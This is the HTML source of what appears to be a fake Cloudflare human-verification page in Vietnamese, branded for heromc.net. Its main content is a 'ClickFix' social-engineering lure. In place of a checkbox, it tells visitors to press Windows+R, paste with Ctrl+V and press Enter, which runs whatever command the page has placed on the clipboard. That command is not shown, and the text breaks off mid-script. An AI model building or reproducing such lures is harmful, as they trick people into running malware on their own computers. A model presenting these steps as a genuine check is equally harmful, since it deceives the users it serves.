<html lang="en-US" dir="ltr">

<head>
    <title>Chờ một chút...</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge">
    <meta name="robots" content="noindex,nofollow">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <style>
        * {
            box-sizing: border-box;
            margin: 0;
            padding: 0
        }
        
        html {
            line-height: 1.15;
            -webkit-text-size-adjust: 100%;
            color: #313131;
            font-family: system-ui, -apple-system, BlinkMacSystemFont, Segoe UI, Roboto, Helvetica Neue, Arial, Noto Sans, sans-serif, Apple Color Emoji, Segoe UI Emoji, Segoe UI Symbol, Noto Color Emoji
        }
        
        body {
            display: flex;
            flex-direction: column;
            height: 100vh;
            min-height: 100vh
        }
        
        .main-content {
            margin: 8rem auto;
            max-width: 60rem;
            padding-left: 1.5rem
        }
        
        @media (width < 720px) {
            .main-content {
                margin-top: 4rem
            }
        }
        
        .h2 {
            font-size: 1.5rem;
            font-weight: 500;
            line-height: 2.25rem
        }
        
        @media (width < 720px) {
            .h2 {
                font-size: 1.25rem;
                line-height: 1.5rem
            }
        }
        
        #challenge-error-text {
            background-image: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgMTMgMTNBMTMuMDE1IDEzLjAxNSAwIDAgMCAxNiAzbTAgMjRhMTEgMTEgMCAxIDEgMTEtMTEgMTEuMDEgMTEuMDEgMCAwIDEtMTEgMTEiLz48cGF0aCBmaWxsPSIjQjIwRjAzIiBkPSJNMTcuMDM4IDE4LjYxNUgxNC44N0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);
            background-repeat: no-repeat;
            background-size: contain;
            padding-left: 34px
        }
        
        @media (prefers-color-scheme: dark) {
            body {
                background-color: #222;
                color: #d9d9d9
            }
        }
    </style>
    <meta http-equiv="refresh" content="390">
    <script src="/cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8eedc814496204a1"></script>
    <style>
        * {
            box-sizing: border-box;
            margin: 0;
            padding: 0
        }
        
        html {
            line-height: 1.15;
            -webkit-text-size-adjust: 100%;
            color: #313131
        }
        
        button,
        html {
            font-family: system-ui, -apple-system, BlinkMacSystemFont, Segoe UI, Roboto, Helvetica Neue, Arial, Noto Sans, sans-serif, Apple Color Emoji, Segoe UI Emoji, Segoe UI Symbol, Noto Color Emoji
        }
        
        body {
            display: flex;
            flex-direction: column;
            height: 100vh;
            min-height: 100vh
        }
        
        body.no-js .loading-spinner {
            visibility: hidden
        }
        
        body.theme-dark {
            background-color: #222;
            color: #d9d9d9
        }
        
        body.theme-dark a {
            color: #fff
        }
        
        body.theme-dark a:hover {
            color: #ee730a;
            text-decoration: underline
        }
        
        body.theme-dark .lds-ring div {
            border-color: #999 transparent transparent
        }
        
        body.theme-dark .font-red {
            color: #b20f03
        }
        
        body.theme-dark .ctp-button {
            background-color: #4693ff;
            color: #1d1d1d
        }
        
        body.theme-dark #challenge-success-text {
            background-image: url("data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=")
        }
        
        body.theme-dark #challenge-error-text {
            background-image: url("data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgMTMgMTNBMTMuMDE1IDEzLjAxNSAwIDAgMCAxNiAzbTAgMjRhMTEgMTEgMCAxIDEgMTEtMTEgMTEuMDEgMTEuMDEgMCAwIDEtMTEgMTEiLz48cGF0aCBmaWxsPSIjQjIwRjAzIiBkPSJNMTcuMDM4IDE4LjYxNUgxNC44N0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+")
        }
        
        body.theme-light {
            background-color: #fff;
            color: #313131
        }
        
        body.theme-light a {
            color: #0051c3
        }
        
        body.theme-light a:hover {
            color: #ee730a;
            text-decoration: underline
        }
        
        body.theme-light .lds-ring div {
            border-color: #595959 transparent transparent
        }
        
        body.theme-light .font-red {
            color: #fc574a
        }
        
        body.theme-light .ctp-button {
            background-color: #003681;
            border-color: #003681;
            color: #fff
        }
        
        body.theme-light #challenge-success-text {
            background-image: url("data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=")
        }
        
        body.theme-light #challenge-error-text {
            background-image: url("data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI2ZjNTc0YSIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgMTMgMTNBMTMuMDE1IDEzLjAxNSAwIDAgMCAxNiAzbTAgMjRhMTEgMTEgMCAxIDEgMTEtMTEgMTEuMDEgMTEuMDEgMCAwIDEtMTEgMTEiLz48cGF0aCBmaWxsPSIjZmM1NzRhIiBkPSJNMTcuMDM4IDE4LjYxNUgxNC44N0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+")
        }
        
        a {
            background-color: transparent;
            color: #0051c3;
            text-decoration: none;
            transition: color .15s ease
        }
        
        a:hover {
            color: #ee730a;
            text-decoration: underline
        }
        
        .main-content {
            margin: 8rem auto;
            max-width: 60rem;
            padding-left: 1.5rem;
            padding-right: 1.5rem;
            width: 100%
        }
        
        .main-content .loading-spinner {
            height: 76.391px
        }
        
        .spacer {
            margin: 2rem 0
        }
        
        .spacer-top {
            margin-top: 4rem
        }
        
        .spacer-bottom {
            margin-bottom: 2rem
        }
        
        .heading-favicon {
            height: 2rem;
            margin-right: .5rem;
            width: 2rem
        }
        
        @media (width < 720px) {
            .main-content {
                margin-top: 4rem
            }
            .heading-favicon {
                height: 1.5rem;
                width: 1.5rem
            }
        }
        
        .main-wrapper {
            align-items: center;
            display: flex;
            flex: 1;
            flex-direction: column
        }
        
        .font-red {
            color: #b20f03
        }
        
        .h1 {
            font-size: 2.5rem;
            font-weight: 500;
            line-height: 3.75rem
        }
        
        .h2 {
            font-weight: 500
        }
        
        .core-msg,
        .h2 {
            font-size: 1.5rem;
            line-height: 2.25rem
        }
        
        .body-text,
        .core-msg {
            font-weight: 400
        }
        
        .body-text {
            font-size: 1rem;
            line-height: 1.25rem
        }
        
        @media (width < 720px) {
            .h1 {
                font-size: 1.5rem;
                line-height: 1.75rem
            }
            .h2 {
                font-size: 1.25rem
            }
            .core-msg,
            .h2 {
                line-height: 1.5rem
            }
            .core-msg {
                font-size: 1rem
            }
        }
        
        #challenge-error-text {
            background-image: url("data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI2ZjNTc0YSIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgMTMgMTNBMTMuMDE1IDEzLjAxNSAwIDAgMCAxNiAzbTAgMjRhMTEgMTEgMCAxIDEgMTEtMTEgMTEuMDEgMTEuMDEgMCAwIDEtMTEgMTEiLz48cGF0aCBmaWxsPSIjZmM1NzRhIiBkPSJNMTcuMDM4IDE4LjYxNUgxNC44N0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+");
            padding-left: 34px
        }
        
        #challenge-error-text,
        #challenge-success-text {
            background-repeat: no-repeat;
            background-size: contain
        }
        
        #challenge-success-text {
            background-image: url("data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=");
            padding-left: 42px
        }
        
        .text-center {
            text-align: center
        }
        
        .ctp-button {
            background-color: #0051c3;
            border: .063rem solid #0051c3;
            border-radius: .313rem;
            color: #fff;
            cursor: pointer;
            font-size: .875rem;
            line-height: 1.313rem;
            margin: 2rem 0;
            padding: .375rem 1rem;
            transition-duration: .2s;
            transition-property: background-color, border-color, color;
            transition-timing-function: ease
        }
        
        .ctp-button:hover {
            background-color: #003681;
            border-color: #003681;
            color: #fff;
            cursor: pointer
        }
        
        .footer {
            font-size: .75rem;
            line-height: 1.125rem;
            margin: 0 auto;
            max-width: 60rem;
            padding-left: 1.5rem;
            padding-right: 1.5rem;
            width: 100%
        }
        
        .footer-inner {
            border-top: 1px solid #d9d9d9;
            padding-bottom: 1rem;
            padding-top: 1rem
        }
        
        .clearfix:after {
            clear: both;
            content: "";
            display: table
        }
        
        .clearfix .column {
            float: left;
            padding-right: 1.5rem;
            width: 50%
        }
        
        .diagnostic-wrapper {
            margin-bottom: .5rem
        }
        
        .footer .ray-id {
            text-align: center
        }
        
        .footer .ray-id code {
            font-family: monaco, courier, monospace
        }
        
        .core-msg,
        .zone-name-title {
            overflow-wrap: break-word
        }
        
        @media (width < 720px) {
            .diagnostic-wrapper {
                display: flex;
                flex-wrap: wrap;
                justify-content: center
            }
            .clearfix:after {
                clear: none;
                content: none;
                display: initial;
                text-align: center
            }
            .column {
                padding-bottom: 2rem
            }
            .clearfix .column {
                float: none;
                padding: 0;
                width: auto;
                word-break: keep-all
            }
            .zone-name-title {
                margin-bottom: 1rem
            }
        }
        
        .loading-spinner {
            height: 76.391px
        }
        
        .lds-ring {
            display: inline-block;
            position: relative
        }
        
        .lds-ring,
        .lds-ring div {
            height: 1.875rem;
            width: 1.875rem
        }
        
        .lds-ring div {
            animation: lds-ring 1.2s cubic-bezier(.5, 0, .5, 1) infinite;
            border: .3rem solid transparent;
            border-radius: 50%;
            border-top-color: #313131;
            box-sizing: border-box;
            display: block;
            position: absolute
        }
        
        .lds-ring div:first-child {
            animation-delay: -.45s
        }
        
        .lds-ring div:nth-child(2) {
            animation-delay: -.3s
        }
        
        .lds-ring div:nth-child(3) {
            animation-delay: -.15s
        }
        
        @keyframes lds-ring {
            0% {
                transform: rotate(0deg)
            }
            to {
                transform: rotate(1turn)
            }
        }
        
        .rtl .heading-favicon {
            margin-left: .5rem;
            margin-right: 0
        }
        
        .rtl #challenge-success-text {
            background-position: 100%;
            padding-left: 0;
            padding-right: 42px
        }
        
        .rtl #challenge-error-text {
            background-position: 100%;
            padding-left: 0;
            padding-right: 34px
        }
        
        .challenge-content .loading-spinner {
            height: 76.391px
        }
        
        @media (prefers-color-scheme: dark) {
            body {
                background-color: #222;
                color: #d9d9d9
            }
            body a {
                color: #fff
            }
            body a:hover {
                color: #ee730a;
                text-decoration: underline
            }
            body .lds-ring div {
                border-color: #999 transparent transparent
            }
            body .font-red {
                color: #b20f03
            }
            body .ctp-button {
                background-color: #4693ff;
                color: #1d1d1d
            }
            body #challenge-success-text {
                background-image: url("data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=")
            }
            body #challenge-error-text {
                background-image: url("data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgMTMgMTNBMTMuMDE1IDEzLjAxNSAwIDAgMCAxNiAzbTAgMjRhMTEgMTEgMCAxIDEgMTEtMTEgMTEuMDEgMTEuMDEgMCAwIDEtMTEgMTEiLz48cGF0aCBmaWxsPSIjQjIwRjAzIiBkPSJNMTcuMDM4IDE4LjYxNUgxNC44N0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+")
            }
        }
        
        \n
        /*# sourceMappingURL=to.css.map */
    </style>
<style>
.verification-box {
       border: 1px solid #333;
            padding: 15px;
            display: flex;
            align-items: center;
            justify-content: space-between;
            background-color: rgba(0, 0, 0, 0.2);
            margin-bottom: 40px;
}

.verification-box:hover {
    transform: translateY(-3px);
    box-shadow: 0 6px 12px rgba(0, 0, 0, 0.3);
}

.checkbox-container {
    display: flex;
    align-items: flex-start;
    gap: 15px;
}

.checkbox {
    width: 20px;
    height: 20px;
    border: 2px solid #fff;
    border-radius: 4px;
    background: transparent;
    cursor: pointer;
  
}


kbd {
    background: #333;
    border-radius: 4px;
    padding: 3px 6px;
    font-size: 0.9em;
    font-weight: bold;
    color: #fff;
    font-family: 'Courier New', Courier, monospace;
    box-shadow: inset 0 -1px 0 rgba(255, 255, 255, 0.2);
}

.cloudflare-logo {
    height: 40px;
    transition: opacity 0.3s;
}

.cloudflare-logo:hover {
    opacity: 0.8;
}

</style>
    <script src="https://challenges.cloudflare.com/turnstile/v0/g/f9063374b04d/api.js?onload=fjGVd3&amp;render=explicit" async="" defer="" crossorigin="anonymous"></script>
</head>

<body class="no-js">
    <div class="main-wrapper" role="main">
        <div class="main-content">
            <h1 class="zone-name-title h1">heromc.net</h1>
            <p id="sPknD4" class="h2 spacer-bottom">Xác minh bạn là con người bằng cách hoàn thành hành động bên dưới.</p>
            <div id="rvwE0" style="display: grid;">
                <div>
                    <div>
                      <div class="verification-box">
    <div class="checkbox-container">
     
        <span>
            + Nhấn phím tắt: <kbd>Windows</kbd> + <kbd>R</kbd> <br><br>
            + Nhấn phím tắt: <kbd>Ctrl</kbd> + <kbd>V</kbd> <br><br>
            + Nhấn <kbd>Enter</kbd> hoặc chọn <strong>Ok</strong>
        </span>
    </div>
    <img src="https://www.cloudflare.com/img/logo-cloudflare-dark.svg" 
         alt="Cloudflare Logo" 
         class="cloudflare-logo">
</div>

                    </div>
                </div>
            </div>
            <div id="PkLHp7" class="spacer loading-spinner" style="display: none; visibility: hidden;">
                <div class="lds-ring">
                    <div></div>
                    <div></div>
                    <div></div>
                    <div></div>
                </div>
            </div>
            <div id="aCOin8" class="core-msg spacer spacer-top">heromc.net cần đánh giá tính bảo mật kết nối của bạn trước khi tiếp tục.</div>
            <div id="jbnL5" style="display: none;">
                <div id="challenge-success-text" class="h2">Xác minh thành công</div>
                <div class="core-msg spacer">Đang chờ heromc.net phản hồi...</div>
            </div>
            <noscript>
                <div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span>
                </div>
            </noscript>
        </div>
    </div>
    <script>
        (function() {
            window._cf_chl_opt = {
                cvId: '3',
                cZone: "taphoammo.net",
                cType: 'managed',
                cRay: '8eedc814496204a1',
                cH: 'W_Y95k6Sh9ahiqWghVrjYs4KEoKzzQapmYJKIGFsFJQ-1733671667-1.2.1.1-AUp9bI.m7pm2EI7ZgIdKErtx_JvXpw4ufiR0dD_vywLI0AfuR70D9d5EY0rSaH_b',
                cUPMDTk: "\/danh-muc\/none?q=&t=&u=7f0439dc-d30b-46ff-8a1b-e704e9cf4852&__cf_chl_tk=E4D8u0QnlgGZiMiUnKmi6Pl9Ab.zAearVyIgpsgmxL8-1733671667-1.0.1.1-kg7vyyZxz0vKcj5Cy887P7cE02Rkr9aCLhohsqe87ZM",
                cFPWv: 'g',
                cITimeS: '1733671667',
                cTTimeMs: '1000',
                cMTimeMs: '390000',
                cTplC: 0,
                cTplV: 5,
                cTplB: 'cf',
                cK: "",
                fa: "\/danh-muc\/none?q=&t=&u=7f0439dc-d30b-46ff-8a1b-e704e9cf4852&__cf_chl_f_tk=E4D8u0QnlgGZiMiUnKmi6Pl9Ab.zAearVyIgpsgmxL8-1733671667-1.0.1.1-kg7vyyZxz0vKcj5Cy887P7cE02Rkr9aCLhohsqe87ZM",
                md: "DgyRJKSHTJfaxcReGQT5F0qqMmNcBmknYdShdHiCCzo-1733671667-1.2.1.1-fIj5bABjT4QJ6g9o9K2dcbfwCFc.pFLnF2JDBR9SxgoSieBiupSe46dN1iA4XjrDMzwlKy59k8dbB3KaBbC5FaSrRL.U64uFvdsSXqp.UAtQ2dumAQuIfT01B2GZod.NQ2XuHqOu_._kJMF7K64u25ciTnp808ADDAj3OQlYh7KBK2gqsIXIiMdUCqek8BFtm8E28TlgYDkYmNjeodOt5RMxtyNXF6OJE7BId8DV3FD7Y_NYLTbG039M7IOhOavBanApoEdzM0C4GTXaeAwzg1cM8XD15nPCUsBC29rBH8YIPUt4F4vhARfnTe7bC71Gd0dZdPeTgnb59wBr4oiLgak4WF.SJWkGBmwHcFDAGCiGbdGNsNYuflpaGV_qGCahMy4.gqPzJwZf8aR1SOA8GrxrQmEXbML2YuD8GZzcwTfB2LK78MMo7Tz8qU49c2bR31QwENvTx_UjWudkCy.IYBwSQHEh3bYoD.cOCioqvqjgMKRW.W9yaAGCsdTWbr193OelbA7.AWUdlL7ijjw.V3FUPntjyWJt8KoM9Yed7tT_Qk.aFd6FMmQk4gu4iqr9rEOSig_ivRrWxR4N2DYtO0JY9e1TJBRguMI_6D5XpOVeLjujoJulJeg.jWt2DneyqmyWWNw8XcVP2_V3UhJphmK.6lMf6B1Pibg4X4fXtipeCFzdERV9L.3TS7soAMxI4d6uPONAiN6xjvCfxu2MQUlTs5MGV7ANHvRTGB4pBh.KceMT40dxu70a2yR9OnY8.0T67qcJoLAIu5G.zIF7JPr.ntv9PP3BIul4FfzNg4JwQKd9rDx6XKRiIFFgsO.EVylFEHyA1EYQqUD.8N7o00NemBX.KLN1y_OueQ3nYtpBvIkWZs5D8nI8xZulgqFUNbgJINbfAeXINcsa27MKSSYSV4J72hcHtL3C1hNTf6RYV42lGMERMe2o3hCpcmsgy.lJhQSYEWCL26i7jPp6IExukN6PDU3q3HICuwqOqW1hbqJGBUW4e49cBqePR4caAlcgF0qnXmuW41c7BxeekufJ6bUw37M0TA0gnq5FyN7RX.GxMdaBmrWAZmgbuVxIku6zMi3.Op_8UDaE0ZiNK2ARqdE2QmANUTZn0jG1wCQCa3Pu14miKLRHXEn224pYWgnPa_PFbsemNcQqgq0s5eFDM078QtNOSVZTHWEvjEnYPa4JfNFBYieDetAsgWr_MOJodnqDtO8XerblPIvDki8g474DqIODrZIQcr52skG7lP605Ic94YdADbM3li6.LFpaBplfyjPfhulU8vukx2s1lqMQ0QKZ9KWbZrYL4J0S4plpSZwVa491zrNoGlcNzrthEtz0lQtDH0Dpt9jfSMV6Kn4Rj2.THctdjwfaKQF2mP2hZXqR2Yy5XzDwq9BrT9Bq_YeRHcgE3RnxmGxk32DL5.IeAuLZTaB2JRgBsWGs9OK9kfMlfhqIclk9atjfiMymsGbEonUwa.U50MmxCAE388NCrNHeD1wTU4SaTUqDyT2YDvyhBEiuLRkDLS6J66MhrAOij7PHYPxnMuIVQE7KtBA_fu.5bvhgsCzFExc1et5of2dHe46TtGGHTQ5AEaLIvuB5fnQbmypOiM9wDl6dcridOqvnzoScNXH5ZLzhSs3OkJG7fpUNvAmPAxE.RgFR61ulq..X7__Jgp4TzmV9OI5WkP.bKmD__vbnghlAQYcVKTZouPmY4mftX0KydzQ5uBFTB2B18QZ_6NMZtktvC.oKeKOf6NzenqSZnZGwK1MjVrxUMum9f6RoP18RD6rccaxLnMqA8oRbQ0AOZClk_WiqHrm9WLwRoqQtPiHnU5SsJfoLsGJcGm5cSiWNQICn5OChM7dONy1G8xrILbXUYvAr0AE7NcRYrt9D5Brf0paK13haNc0wHJhxsHxtq4RtH_JsajODzxMWaDs6dFyFJNrwUZ7aC9WRYB4Bbxk87CkXVcpSRNW_bmIEe109Gp7SUmHA3GHl_UQ4_cWLFOwnMgfEnVw3ocvdrjrjN9ToRp6c.9hLE4gafF26dlsS9QuPZ2k7dyQ1gVlRb8H85pmV7OfLE2gOOtOCFPzfnFU69MZ51jxuShOBGnswMxhbL3sDVXhMs6vbSA5jqGBgbGmZvpJ7xcGwgXx6t3kyVpsrhpZB1_Ent8CDbxQkAb4fC4MKA9lsAzZbOG3oy6GzKMZaLm4P9__062jIzYrWyK6p1JQL0tuQLkWCU5fxqpp2FL2..D.pLQ5jz4klD1BdkqISUkeyH_J8pmBHX.Ndrcg602lxA3R7sgcLL2wwl0tlxhdHs3wDBm5VfNCm7_w7cU.aRx265E3HGqlJzxDbkyekUzZ2P1B18WaZ8LFa.PI0xEHwiEQvrRVaMzxfBe0PdOFv2Ks.1nhwYM5xlMrxWHZhaxSP5WdiOyUsyugkGg5nsjQwpmp_5_.6l9_Ly7jANOs1IwA0sD30dQKTqkkwsIw6c8SAlXwoGFzzNHp4D3t5BmqNHh6NVwZUMGyM.uAgHZZD8iPhzHRw4dBGywOgRTeBMV_Xm9EgoqAOC9fP8ZzSPAEoEwT7f5ga5j3baN7JhQSpnF5fWtcr_rryq12RB3nWCwoXiWUuOVRYn3v5b0Kiql30n9_4gyxuo_FyS8MHa.AP63Y5gg7ODEZ3OdsY3ChpMJ.ZTFKNsXSx9xEppnT1JQr8KnE3JMJQ0oyCojmPD3Ygbs4YjQZIuwuIH3jPUoKm4f86fdeQT2HJxTUSV9cZ9tF7tTydVilu1PBnR7u3HABBIsv4rGcuPmY8MQ5MGrpnmq1FfKoFOCDX5S7o.cxnffGQwJW5qfCsn.DyeUkofnCBLuUVW9aJht6EEKtmtQHVaP6ektgzXmU3jtX0ksIVCJqOWZqONwmBPcbHAjetZ5v1tHM697kJJ_2RToekXjY9Ogwu.7NuezSVDDnwuob8",
                mdrd: "n6x0d_pNm21dgyh76aQVdrbFA80vRiWHl_vcmSJTCkY-1733671667-1.2.1.1-uQaqHJsXq3toIO4czmVZsNWSVYx7FXLiSAZRdHkx0Rp767Egl0e7WCy5oiPPsaxj2FSR1eGC7BgzB6xlEoiNSLmm_Js_tpI1RGIOffFiIF3cnvCkFAze7BcsMNmMUxykUKl4D_r_aANFJ0EBoG6gbTYvGwLqGXuky4sKVq5WD1FCdEyr0k1Uz3cNgMUWRddwM1Iy15HYJIih4sgGsLY1v9kuciRPKJh7h0SphEBUB9l.yrfXn0cVuaSC8gOm9Ri4tkIHnBwG2btwfyJMXnpK1RHgmQCMm4iYttglrHV7_abkeR7O7bhISKAsfYZPfKKO8GO9U9bTkx8KvctW8gx28Q514FL9TjEkQ9Wfg2dbY3wP3BHv4Bi6UJYSFK61Q7JyurLhQkNfqtl.4Vd71g8ZWlfyGGoIXnKb60Kb7aXzKWUq3BslVyq9_sux3L8KLs17ZMwLs8uu0565XjcL0h91_u.nn9YX6Q4R_p.mQqzVgnwjAHLw30F33lJL.EZzQgcKxEmat6lqjg_TA8cI6dPJcLF250JnDZs_jC_uY1v.awb5rwYxaXqbWHObGENMhlloNMbtP0s_R1xaH5jO2RObdFqMU2HpdaQ2iGzUgebxxprzZQoxGeE9CUr3IgOxXLFZTg_smHP3F3eiiei9vPe9abSFofOU3ODnYbmskBbFUgUcpauXfs76iljpYU6nb3XERRpfZ5w6PmIEng13jc4.dju3YS61dPvaFOfyDtJG_b_urgP7__s1.vXhO5og1rYeisevc6EECScjC.Cn.JNHYtnf7UYM.2eiUvD8jivQZyMHlPC2l8QpLkbtZKZ4ahHaunJZg4.87ARga_R0TE5q5AHCM2zaEhrA2.rqqgRuMFm22Menmuj8cpdv9rm3qgPETtLpyEpRiwgegykKBe_A.7tdKec_IzBo6DgI5sN1vPxrTAR9krdSm5NpzlUAA_hYpw4A1q20rjypK7T9.lmybVdpkW03UvKg8xvnyQdiHlDmbR86M54hNSDx6.2RdP4vurILZj_8Yaf16UEJQgtVV0HK7jM_Wq9ufnzRBvkgNIO3jYfMYsTh_uRWjJQwGFo1ndep8uqz0k8dvjMUZ4bO.0fwNq6vusHndpozSRjjvZv0bm34MiNz0yJhymavxR.ecIegiD4RV8m4tBdWmEJL36Ch8HYKV3RIbEMkgLDp0VqRhaQVxvcjyBghqn8cQ00l7uBLKCo564yUbHFhXURtr7ODKQyOy6WVrltsnTj0TzASxjiUkNt0QUKLcKKjaXabka7sQegDCTtPBlLe4bQZt.HMOv1RoC6a1mgm8kFoZ2gWHo4K9RlSy0SFo0FELCzzCVYan7.LaCMRYoy8BJTJv5OTLtwSv4iB305avQeblvWbCnRMcuAfZmuPTcGtNuQ4T5.q9pxsMd65GLsrrBPBOaHiyblXNw5kxa1O.6r1OdZ9RqgAk4XZOATm11zIxxOtTxnHh7lo1Rtx.Mfixb5o5FEPX2FLn3WQIH63zZVIY7CxDvOVOibZDlr.q5.HiENKoUVG0B40I.nVZNkgjiV2Gr3po6yq_bBPl8sR8Ge0Uwo.OII1cFeXSDTRr6ME2H7NPC7BSaFoP2ZTI4e1a2xgIwtS3OvJsGNFPWiILKUqXUIc51qNQLojggug90Tlv.zxN.lki4UA2hzWVpdNoXtld6SCPW4zSdBK3FJx6iJP4bA06nzV5e3ypGdSYeZc4sJci2tPhaFJDyRKMzamDhn85oCgBFDJc44aIym3wx5EOKZPrYb60KgdgPOUchjqhW0H1DaGYK6kS_Wj74kZakU9ey29DydXwJjfp1zCG0NfotyOAqEhfgimZCLw